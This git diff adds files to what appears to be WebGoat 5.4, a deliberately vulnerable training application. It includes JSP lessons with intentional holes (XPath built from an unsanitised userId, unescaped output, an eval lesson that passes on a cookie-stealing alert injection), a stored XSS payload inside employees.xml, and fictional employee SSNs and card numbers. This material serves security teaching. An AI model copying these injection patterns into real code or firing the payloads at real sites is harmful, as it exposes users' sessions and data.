diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/XPATHInjection_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/formate.css b/webgoat-5.4/src/main/webapp/lesson_solutions/formate.css
new file mode 100644
index 000000000..be54b8cca
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/formate.css
@@ -0,0 +1,2 @@
+* { font-family:"Arial","sans-serif"; }
+code { font-family:"Courier New"; font-size:10pt; }
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
new file mode 100644
index 000000000..178b75d3c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering.jsp
@@ -0,0 +1,114 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+ pageEncoding="ISO-8859-1"%>
+
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
+
+<%
+
+ String userId = request.getParameter("userId");
+
+
+ NodeList nodes = null;
+
+
+
+ File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+
+ if(d.exists()){
+ System.out.print("File does exist");
+ }
+ else{
+ System.out.print("File DOES NOT exist");
+ }
+
+ System.out.println(d.getAbsolutePath());
+ XPathFactory factory = XPathFactory.newInstance();
+ XPath xPath = factory.newXPath();
+ InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+
+
+
+
+ StringBuffer sb = new StringBuffer();
+
+ sb.append("/Employees/Employee/UserID | ");
+ sb.append("/Employees/Employee/FirstName | ");
+ sb.append("/Employees/Employee/LastName | ");
+ sb.append("/Employees/Employee/SSN | ");
+ sb.append("/Employees/Employee/Salary ");
+
+ String expression = sb.toString();
+
+
+ System.out.print("expression:" + expression);
+
+
+
+ nodes = (NodeList) xPath.evaluate(expression, inputSource,
+ XPathConstants.NODESET);
+ int nodesLength = nodes.getLength();
+
+
+ System.out.println("nodesLength:" + nodesLength);
+
+ TR tr;
+
+ int COLUMNS = 5;
+
+ Table t2 = null;
+ if (nodesLength > 0)
+ {
+ t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+ 1).setWidth("90%").setAlign("center");
+ tr = new TR();
+ tr.addElement(new TD().addElement("UserID"));
+ tr.addElement(new TD().addElement("First Name"));
+ tr.addElement(new TD().addElement("Last Name"));
+ tr.addElement(new TD().addElement("SSN"));
+ tr.addElement(new TD().addElement("Salary"));
+ t2.addElement(tr);
+ }
+
+
+
+ tr = new TR();
+
+ for (int i = 0; i < nodesLength; i++)
+ {
+ Node node = nodes.item(i);
+
+ if(i%COLUMNS==0){
+ tr = new TR();
+ tr.setID(node.getTextContent());
+ //tr.setStyle("display: none");
+ }
+
+ tr.addElement(new TD().addElement(node.getTextContent()));
+
+ if(i%COLUMNS==(COLUMNS-1)){
+ t2.addElement(tr);
+ }
+ }
+
+ if(t2 != null){
+ out.println(t2.toString());
+ }
+ else{
+ out.println("No Results");
+ }
+
+
+
+
+
+
+
+
+
+
+
+%>
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp
new file mode 100644
index 000000000..f8181cb0b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideFiltering_backup.jsp
@@ -0,0 +1,114 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+ pageEncoding="ISO-8859-1"%>
+
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
+
+<%
+
+ String userId = request.getParameter("userID");
+
+
+ NodeList nodes = null;
+
+
+
+ File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+
+ if(d.exists()){
+ System.out.print("File does exist");
+ }
+ else{
+ System.out.print("File DOES NOT exist");
+ }
+
+ System.out.println(d.getAbsolutePath());
+ XPathFactory factory = XPathFactory.newInstance();
+ XPath xPath = factory.newXPath();
+ InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+
+
+
+
+ StringBuffer sb = new StringBuffer();
+
+ sb.append("/Employees/Employee/UserID | ");
+ sb.append("/Employees/Employee/FirstName | ");
+ sb.append("/Employees/Employee/LastName | ");
+ sb.append("/Employees/Employee/SSN | ");
+ sb.append("/Employees/Employee/Salary ");
+
+ String expression = sb.toString();
+
+
+ System.out.print("expression:" + expression);
+
+
+
+ nodes = (NodeList) xPath.evaluate(expression, inputSource,
+ XPathConstants.NODESET);
+ int nodesLength = nodes.getLength();
+
+
+ System.out.println("nodesLength:" + nodesLength);
+
+ TR tr;
+
+ int COLUMNS = 5;
+
+ Table t2 = null;
+ if (nodesLength > 0)
+ {
+ t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+ 1).setWidth("90%").setAlign("center");
+ tr = new TR();
+ tr.addElement(new TD().addElement("UserID"));
+ tr.addElement(new TD().addElement("First Name"));
+ tr.addElement(new TD().addElement("Last Name"));
+ tr.addElement(new TD().addElement("SSN"));
+ tr.addElement(new TD().addElement("Salary"));
+ t2.addElement(tr);
+ }
+
+
+
+ tr = new TR();
+
+ for (int i = 0; i < nodesLength; i++)
+ {
+ Node node = nodes.item(i);
+
+ if(i%COLUMNS==0){
+ tr = new TR();
+ tr.setID(node.getTextContent());
+ //tr.setStyle("display: none");
+ }
+
+ tr.addElement(new TD().addElement(node.getTextContent()));
+
+ if(i%COLUMNS==(COLUMNS-1)){
+ t2.addElement(tr);
+ }
+ }
+
+ if(t2 != null){
+ out.println(t2.toString());
+ }
+ else{
+ out.println("No Results");
+ }
+
+
+
+
+
+
+
+
+
+
+
+%>
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideValidation.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideValidation.jsp
new file mode 100644
index 000000000..a035833c3
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/clientSideValidation.jsp
@@ -0,0 +1,30 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+ pageEncoding="ISO-8859-1"%>
+
+
+
+<% String coupon = request.getParameter("coupon");
+
+if (coupon.equalsIgnoreCase("PLATINUM")){
+ out.print(".25");
+}
+else if (coupon.equalsIgnoreCase("GOLD")){
+ out.print(".5");
+}
+else if (coupon.equalsIgnoreCase("SILVER")){
+ out.print(".75");
+}
+else if (coupon.equalsIgnoreCase("BRONZE")){
+ out.print(".8");
+}
+else if (coupon.equalsIgnoreCase("PRESSONE")){
+ out.print(".9");
+}
+else if (coupon.equalsIgnoreCase("PRESSTWO")){
+ out.print(".95");
+}
+
+
+
+%>
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/employees.xml b/webgoat-5.4/src/main/webapp/lessons/Ajax/employees.xml
new file mode 100644
index 000000000..8e0df8fcc
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/employees.xml
@@ -0,0 +1,254 @@
+
+
+
+ 101
+ Larry
+ Stooge
+ 9175 Guilford Rd
+ New York, NY
+ 443-689-0192
+ 1012000
+ 386-09-5451
+ 55000
+ 2578546969853547
+ 5000
+ Does not work well with others
+ Constantly harassing coworkers
+ 10106
+
+ 102
+ 111
+ 112
+
+
+
+ 102
+ Moe
+ Stooge
+ 3013 AMD Ave
+ New York, NY
+ 443-938-5301
+ 3082003
+ 936-18-4524
+ 140000
+ NA
+ 0
+ Very dominating over Larry and Curly
+ Hit Curly over head
+ 101013
+
+ 112
+
+
+
+ 103
+ Curly
+ Stooge
+ 1112 Crusoe Lane
+ New York, NY
+ 410-667-6654
+ 2122001
+ 961-08-0047
+ 50000
+ NA
+ 0
+ Owes three-thousand to company for fradulent purchases
+ Hit Moe back
+ 101014
+
+ 102
+ 111
+ 112
+
+
+
+ 104
+ Eric
+ Walker
+ 1160 Prescott Rd
+ New York, NY
+ 410-887-1193
+ 12152005
+ 445-66-5565
+ 13000
+ NA
+ 0
+ Late. Always needs help. Too intern-ish.
+ Bothering Larry about webgoat problems
+ 101013
+
+ 107
+ 102
+ 111
+ 112
+
+
+
+ 105
+ Tom
+ Cat
+ 2211 HyperThread Rd.
+ New York, NY
+ 443-599-0762
+ 1011999
+ 792-14-6364
+ 80000
+ 5481360857968521
+ 30000
+ Co-Owner.
+ NA
+ 0
+
+ 106
+ 102
+ 111
+ 112
+
+
+
+ 106
+ Jerry
+ Mouse
+ 3011 Unix Drive
+ New York, NY
+ 443-699-3366
+ 1011999
+ 858-55-4452
+ 70000
+ 6981754825013564
+ 20000
+ Co-Owner.
+ NA
+ 0
+
+ 102
+ 111
+ 112
+
+
+
+ 107
+ David
+ Giambi
+ 5132 DIMM Avenue
+ New York, NY
+ 610-521-8413
+ 5011999
+ 439-20-9405
+ 100000
+ 6981754825018101
+ 10000
+ Strong work habbit. Questionable ethics.
+ Hacked into accounting server. Modified personal pay.
+ 61402
+
+ 102
+ 111
+ 112
+
+
+
+ 108
+ Bruce
+ McGuirre
+ 8899 FreeBSD Drive<script>alert(document.cookie)</script>
+ New York, NY
+ 610-282-1103
+ 3012000
+ 707-95-9482
+ 110000
+ 6981754825854136
+ 30000
+ Enjoys watching others struggle in exercises.
+ Tortuous Boot Camp workout at 5am. Employees felt sick.
+ 61502
+
+ 107
+ 102
+ 111
+ 112
+
+
+
+ 109
+ Sean
+ Livingston
+ 6422 dFlyBSD Road
+ New York, NY
+ 610-878-9549
+ 6012003
+ 136-55-1046
+ 130000
+ 6981754825014510
+ 5000
+ Has some fascination with Steelers. Go Ravens.
+ Late to work 30 days in row due to excessive Halo 2
+ 72804
+
+ 107
+ 102
+ 111
+ 112
+
+
+
+ 110
+ Joanne
+ McDougal
+ 5567 Broadband Lane
+ New York, NY
+ 610-213-6341
+ 1012001
+ 789-54-2413
+ 90000
+ 6981754825081054
+ 300
+ Finds it necessary to leave early every day.
+ Used company cc to purchase new car. Limit adjusted.
+ 112005
+
+ 106
+ 102
+ 111
+ 112
+
+
+
+ 111
+ John
+ Wayne
+ 129 Third St
+ New York, NY
+ 610-213-1134
+ 1012001
+ 129-69-4572
+ 200000
+ 4437334565679921
+ 300
+ 112005
+
+ 112
+
+
+
+ 112
+ Neville
+ Bartholomew
+ 1 Corporate Headquarters
+ San Jose, CA
+ 408-587-0024
+ 3012000
+ 111-111-1111
+ 450000
+ 4803389267684109
+ 300
+ 112005
+
+ 112
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/eval.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/eval.jsp
new file mode 100644
index 000000000..f288f7637
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/eval.jsp
@@ -0,0 +1,38 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1" import="java.util.regex.*" import="org.owasp.webgoat.lessons.DangerousEval"
+ pageEncoding="ISO-8859-1"%>
+<%
+String action = request.getParameter("action");
+String field1 = request.getParameter("field1");
+String field2 = request.getParameter("field2");
+String regex1 = "^[0-9]{3}$";// any three digits
+Pattern pattern1 = Pattern.compile(regex1);
+
+if(action == null) action = "Purchase";
+if(field1 == null) field1 = "123";
+if(field2 == null) field2 = "-1";
+
+/** For security reasons, we remove all '<' and '>' characters to prevent XSS **/
+// Thank you Victor Bucutea for noticing replaceAll only cleans taint to the return value.
+field1 = field1.replaceAll("<", "");
+field1 = field1.replaceAll(">", "");
+field2 = field2.replaceAll("<", "");
+field2 = field2.replaceAll(">", "");
+
+if("Purchase".equals(action))
+{
+ if(!pattern1.matcher(field1).matches())
+ {
+ /** If they supplied the right attack, pass them **/
+ if(field1.indexOf("');") != -1 && field1.indexOf("alert") != -1 && field1.indexOf("document.cookie") != -1)
+ {
+ session.setAttribute(DangerousEval.PASSED, "true");
+ }
+
+ out.write("alert('Whoops: You entered an incorrect access code of \"" + field1 + "\"');");
+ }
+ else
+ {
+ out.write("alert('Purchase completed successfully with credit card \"" + field2 + "\" and access code \"" + field1 + "\"');");
+ }
+}
+%>
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg b/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg
new file mode 100644
index 000000000..60a809af0
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_header.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg b/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg
new file mode 100644
index 000000000..292d25654
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lessons/Ajax/images/lesson1_workspace.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
new file mode 100644
index 000000000..e6217ecb6
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/instructor/clientSideFiltering_i.jsp
@@ -0,0 +1,111 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+ pageEncoding="ISO-8859-1"%>
+
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>
+
+<%
+
+String userId = request.getParameter("userId");
+
+
+ NodeList nodes = null;
+
+
+
+ File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+
+ if(d.exists()){
+ System.out.print("File does exist");
+ }
+ else{
+ System.out.print("File DOES NOT exist");
+ }
+
+ System.out.println(d.getAbsolutePath());
+ XPathFactory factory = XPathFactory.newInstance();
+ XPath xPath = factory.newXPath();
+ InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+ StringBuffer sb = new StringBuffer();
+
+ sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/UserID | ");
+ sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/FirstName | ");
+ sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/LastName | ");
+ sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/SSN | ");
+ sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/Salary ");
+
+ String expression = sb.toString();
+
+ System.out.print("expression:" + expression);
+
+
+
+
+
+ nodes = (NodeList) xPath.evaluate(expression, inputSource,
+ XPathConstants.NODESET);
+ int nodesLength = nodes.getLength();
+
+
+ System.out.println("nodesLength:" + nodesLength);
+
+ TR tr;
+
+ int COLUMNS = 5;
+
+ Table t2 = null;
+ if (nodesLength > 0)
+ {
+ t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+ 1).setWidth("90%").setAlign("center");
+ tr = new TR();
+ tr.addElement(new TD().addElement("UserID"));
+ tr.addElement(new TD().addElement("First Name"));
+ tr.addElement(new TD().addElement("Last Name"));
+ tr.addElement(new TD().addElement("SSN"));
+ tr.addElement(new TD().addElement("Salary"));
+ t2.addElement(tr);
+ }
+
+
+
+ tr = new TR();
+
+ for (int i = 0; i < nodesLength; i++)
+ {
+ Node node = nodes.item(i);
+
+ if(i%COLUMNS==0){
+ tr = new TR();
+ tr.setID(node.getTextContent());
+ //tr.setStyle("display: none");
+ }
+
+ tr.addElement(new TD().addElement(node.getTextContent()));
+
+ if(i%COLUMNS==(COLUMNS-1)){
+ t2.addElement(tr);
+ }
+ }
+
+ if(t2 != null){
+ out.println(t2.toString());
+ }
+ else{
+ out.println("No Results");
+ }
+
+
+
+
+
+
+
+
+
+
+
+%>
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/Ajax/sameOrigin.jsp b/webgoat-5.4/src/main/webapp/lessons/Ajax/sameOrigin.jsp
new file mode 100644
index 000000000..26e652898
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/Ajax/sameOrigin.jsp
@@ -0,0 +1 @@
+Good Response
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/ConfManagement/config.jsp b/webgoat-5.4/src/main/webapp/lessons/ConfManagement/config.jsp
new file mode 100644
index 000000000..7abe1430f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/ConfManagement/config.jsp
@@ -0,0 +1,19 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+ pageEncoding="ISO-8859-1"%>
+<%@page import="org.owasp.webgoat.session.WebSession"%>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+%>
+
+
+
+Configuration Page
+
+
+<% response.sendRedirect(webSession.getCurrentLesson().getLink() +
+ "&succeeded=yes");
+%>
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css
new file mode 100644
index 000000000..fad6880ad
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
new file mode 100644
index 000000000..a571c370c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/CrossSiteScripting.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
+ errorPage="" %>
+
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+CrossSiteScripting currentLesson = (CrossSiteScripting) webSession.getCurrentLesson();
+%>
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
Welcome Back <%=webSession.getUserNameInLesson()%>
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
new file mode 100644
index 000000000..4f7acd643
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ListStaff.jsp
@@ -0,0 +1,56 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ int myUserId = webSession.getUserIdInLesson();
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/Login.jsp
new file mode 100644
index 000000000..4479289e9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(CrossSiteScripting.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp
new file mode 100644
index 000000000..e9d293a47
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/CrossSiteScripting/ViewProfile.jsp
@@ -0,0 +1,160 @@
+
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" errorPage="" %>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ Employee employee = (Employee) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
+ CrossSiteScripting lesson = (CrossSiteScripting) webSession.getCurrentLesson();
+// int myUserId = getIntSessionAttribute(webSession, "CrossSiteScripting." + CrossSiteScripting.USER_ID);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%>
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+
+
+ <%=lesson.htmlEncode(webSession, employee.getPersonalDescription())%>
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+ Disciplinary Explanation:
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+ Disciplinary Action Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
Welcome Back <%=webSession.getUserNameInLesson()%>
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
new file mode 100755
index 000000000..a7c831377
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ListStaff.jsp
@@ -0,0 +1,56 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ int myUserId = webSession.getUserIdInLesson();
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp
new file mode 100755
index 000000000..9daefd1b6
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(DBCrossSiteScripting.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp
new file mode 100755
index 000000000..ce0fee2b2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBCrossSiteScripting/ViewProfile.jsp
@@ -0,0 +1,151 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" errorPage="" %>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%>
+
+
+
+ First Name:
+
+
+ <%=employee.getFirstName()%>
+
+
+ Last Name:
+
+
+ <%=employee.getLastName()%>
+
+
+ Street:
+
+
+ <%=employee.getAddress1()%>
+
+
+ City/State:
+
+ <%=employee.getAddress2()%>
+
+
+ Phone:
+
+
+ <%=employee.getPhoneNumber()%>
+
+
+ Start Date:
+
+
+ <%=employee.getStartDate()%>
+
+
+ SSN:
+
+
+ <%=employee.getSsn()%>
+
+
+ Salary:
+
+
+ <%=employee.getSalary()%>
+
+
+ Credit Card:
+
+
+ <%=employee.getCcn()%>
+
+
+ Credit Card Limit:
+
+
+ <%=employee.getCcnLimit()%>
+
+
+ Comments:
+
+
+ <%=employee.getPersonalDescription()%>
+
+
+ Manager:
+
+
+ <%=employee.getManager()%>
+
+
+ Disciplinary Explanation:
+
+
+ <%=employee.getDisciplinaryActionNotes()%>
+
+
+ Disciplinary Action Dates:
+
+
+ <%=employee.getDisciplinaryActionDate()%>
+
+
+
+
+
+ <%
+ String subViewPage = currentLesson.getPage(webSession);
+ if (subViewPage != null)
+ {
+ //System.out.println("Including sub view page: " + subViewPage);
+ %>
+
+
Welcome Back <%=webSession.getUserNameInLesson()%>
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
new file mode 100755
index 000000000..3691a8280
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ListStaff.jsp
@@ -0,0 +1,57 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ int myUserId = webSession.getUserIdInLesson();
+%>
+ Welcome Back <%=webSession.getUserNameInLesson()%> - Staff Listing Page
+ Select from the list below
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/Login.jsp b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/Login.jsp
new file mode 100755
index 000000000..4807f7d9c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
+ errorPage="" %>
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ %>
+
+
+
+ <%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
+ String searchedName = request.getParameter(DBSQLInjection.SEARCHNAME);
+ if (searchedName != null)
+ {
+ %>
+ Employee <%=searchedName%> not found.
+ <%
+ }
+ %>
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp
new file mode 100755
index 000000000..bd9151a63
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lessons/DBSQLInjection/ViewProfile.jsp
@@ -0,0 +1,154 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
+ import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection"
+ errorPage="" %>
+<%
+ WebSession webSession = ((WebSession)session.getAttribute("websession"));
